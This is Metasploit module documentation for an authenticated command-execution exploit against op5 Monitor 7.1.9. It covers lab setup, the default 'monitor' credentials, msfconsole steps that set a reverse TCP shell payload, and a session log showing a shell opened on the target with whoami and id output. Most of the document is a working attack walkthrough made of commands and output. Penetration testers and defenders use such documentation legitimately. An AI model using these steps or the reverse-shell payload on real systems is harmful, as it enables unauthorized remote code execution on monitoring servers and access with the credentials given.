## Vulnerable Application

  Official Source: [op5.com](https://www.op5.com/blog/wpfb-file/op5-monitor-7-1-9-20160303-tar-gz/)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

### Creating A Testing Environment

Just a few quick notes on setting up a vulnerable lab with this software.

  1. The vulnerable version only installs on CentOS 6.x (author used 6.0 final)
  2. Within `php.ini`, `date.timezone = "America/New York"` to `date.timezone = "America/New_York"` if you get php errors
  3. You may need to register for a free license via an email challenge/verification

## Verification Steps

  1. Install the software, RHEL/CENTOS required (tested on CentOS 6)
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/op5_config_exec```
  4. Do: ```set payload linux/x86/shell/reverse_tcp```
  5. Do: ```set rhost 192.168.2.31```
  6. Do: ```set lhost 192.168.2.229```
  7. Do: ```exploit```
  8. You should get a shell.

## Options

  **PASSWORD**

  Password is 'monitor' by default.

  **USERNAME**

  Documentation was unclear on this.  Installing just the app, the
  username was 'monitor' by default.  However it looks like if you
  install the appliance it may be 'root'

## Scenarios

  ```
    msf > use exploit/linux/http/op5_config_exec 
    msf exploit(op5_config_exec) > set verbose true
    verbose => true
    msf exploit(op5_config_exec) > set payload linux/x86/shell/reverse_tcp
    payload => linux/x86/shell/reverse_tcp
    msf exploit(op5_config_exec) > set rhost 192.168.2.31
    rhost => 192.168.2.31
    msf exploit(op5_config_exec) > set lhost 192.168.2.229
    lhost => 192.168.2.229
    msf exploit(op5_config_exec) > check
    
    [+] Version Detected: 7.1.9
    [+] The target is vulnerable.
    msf exploit(op5_config_exec) > exploit
    
    [*] Started reverse TCP handler on 192.168.2.229:4444 
    [*] Sending stage (36 bytes) to 192.168.2.31
    [*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.31:52552) at 2016-06-01 14:38:41 -0400
    [*] Command Stager progress - 100.00% done (832/832 bytes)
    whoami
    monitor
    id
    uid=299(monitor) gid=48(apache) groups=48(apache),14(uucp),488(smstools) context=system_u:system_r:initrc_t:s0
  ```